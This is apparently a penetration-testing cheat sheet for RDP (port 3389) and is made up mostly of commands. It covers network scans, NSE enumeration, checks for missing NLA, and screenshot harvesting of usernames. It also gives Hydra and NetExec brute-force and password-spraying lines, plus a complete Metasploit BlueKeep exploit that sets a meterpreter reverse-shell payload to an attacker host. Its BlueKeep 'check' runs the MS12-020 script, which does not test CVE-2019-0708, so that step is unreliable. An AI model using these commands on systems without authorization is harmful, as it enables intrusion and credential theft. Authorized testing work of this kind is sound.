Port 3389 – RDP
Pentesting RDP
Discovery and Enumeration
The first step when encountering an RDP service is confirming the service and gathering useful metadata such as:
• Hostname
• Domain information
• OS version
• Encryption settings
• Whether Network Level Authentication (NLA) is required
Basic port discovery with Nmap. You can find a comprehensive cheat sheet on how to use Nmap here.
nmap -p 3389 --open -T4 -Pn -n 10.1.1.0/24 #Scan a network range for open port 3389 RDP nmap -sV -p 3389 --open -T4 -Pn -n 10.1.1.0/24 #Scan a network range for open port 3389 RDP with service detection
If you’re scanning large address spaces and need speed, use the masscan tool
sudo masscan -p3389 10.0.0.0/8 --rate 10000 -e tun0 #Scan a large subnet for open port 3389
RDP Nmap Scripts
Nmap includes several NSE scripts specifically for RDP enumeration:
nmap --script rdp-enum-encryption -p3389 10.1.1.1 #Determine supported encryption levels nmap --script rdp-ntlm-info -p3389 10.1.1.1 #Extract hostname and domain information by extracting NTLM information nmap --script rdp-vuln-ms12-020 -p3389 10.1.1.1 #Checking for MS12-020 vulnerability nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p3389 -T4 10.1.1.1 #Running multiple RDP scripts
Extracting Domain Information
The rdp-ntlm-info script can reveal valuable Active Directory details. This is extremely valuable if found exposed to the internet. Often, if a risky port such as RDP is exposed, you find other ports or services that can benefit from knowing the domain name, etc., for attacking.
nmap --script rdp-ntlm-info -p3389 10.1.1.1
Example output may reveal:
• NetBIOS computer name
• DNS domain name
• Windows build version
Checking Encryption Configuration
RDP supports different security layers, which may expose weak configurations. You can check encryption levels with the following Nmap command:
nmap --script rdp-enum-encryption -p3389 10.1.1.1
Possible results can include:
• Native RDP Security
• TLS Security
• CredSSP / NLA
Older configurations that support Standard RDP Security may allow downgrade attacks.
Checking if Network Level Authentication (NLA) is Enabled
Network Level Authentication requires authentication before the graphical RDP session begins. If this is not enabled, it allows attackers to connect and view who is logged in to the terminal. This can be leveraged to gather usernames for brute-forcing RDP.
Testing manually with FreeRDP:
xfreerdp /u: /p: /v:10.1.1.1 /dynamic-resolution /sec:tls #If NLA is enabled, the server will reject unauthenticated connections
To bulk test multiple hosts you can create a file of IPs and use the following command to quickly identify if any hosts have NLA disabled.
while read -r ip; do echo -n "$ip: "; xfreerdp /v:"$ip" /u: /p: /sec:tls /timeout:5000 2>&1 | grep -q 'HYBRID_REQUIRED_BY_SERVER' && echo "NLA Enabled" || echo "NLA Not Enabled"; done < RDP_IPs.txt
Checking for BlueKeep
BlueKeep (CVE-2019-0708) is a critical Remote Code Execution vulnerability affecting older Windows systems running RDP. The vulnerability exists in the Remote Desktop Services component and allows unauthenticated attackers to execute code remotely.
Affected systems include:
-
Windows 7
-
Windows Server 2008
-
Windows Server 2008 R2
-
Windows XP (legacy patch released)
This vulnerability is considered wormable, meaning it could potentially spread automatically between vulnerable systems. You can check if a host may be vulnerable using an Nmap NSE script:
nmap --script rdp-vuln-ms12-020 -p3389 10.1.1.1 #Check for RDP vulnerabilities
If the target is identified as vulnerable, you can attempt to exploit it with Metasploit. You can find a comprehensive cheat sheet for using Metasploit here.
msfconsole -q use exploit/windows/rdp/cve_2019_0708_bluekeep_rce show options set RHOSTS 10.1.1.1 set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.2.2.2 run
Screenshot Enumeration
Some RDP login screens can reveal usernames. Some vulnerability scanners, like Nessus, will gather screenshots for you. A good CLI tool is Scrying.
scrying -t rdp://10.1.1.1 #Grab a RDP server screenshot scrying -f targets.txt #Grab a RDP server screenshot for a list of targets
Brute Force Attacks
You can brute force RDP with several tools, including THC Hydra. For a comprehensive cheat sheet on using Hydra, click here.
hydra -L users.txt -P passwords.txt rdp://10.1.1.1 -t 4 #Brute force a list of usernames and passwords hydra -l administrator -P passwords.txt rdp://10.1.1.1 #A single user brute force (If you get a name from screenshot enumeration)
NetExec RDP Attacks
The NetExec tool supports several attacks that you can perform against RDP. You can find my Netexec cheat sheet here with attacks for many other protocols.
nxc rdp 10.1.1.1 -u <user> -p <password> #Testing credentials nxc rdp 10.1.1.1 -u users.txt -p 'Winter2026!' --continue-on-success #RDP password spraying nxc rdp 10.1.1.1 -u users.txt -p passwords.txt #RDP brute forcing nxc rdp targets.txt -u users.txt -p passwords.txt #RDP brute forcing multiple hosts
Connecting to RDP
FreeRDP is an excellent tool for connecting to RDP from Kali or other Linux-based testing systems. If you have successfully compromised credentials using the techniques above, you can attempt to make an RDP connection to the target.
xfreerdp /u:<username> /p:<password> /v:10.1.1.1 #Standard connection xfreerdp /u:<domain>\<username> /p:<password> /v:10.1.1.1 #Domain authentication xfreerdp /u:<username> /p:<password> /v:10.1.1.1 /dynamic-resolution #Dynamic resolution xfreerdp /u:<username> /p:<password> /v:10.1.1.1 +clipboard #Clipboard sharing xfreerdp /u:<username> /p:<password> /v:10.1.1.1 /drive:share,/home/kali/tools #Mounting local directory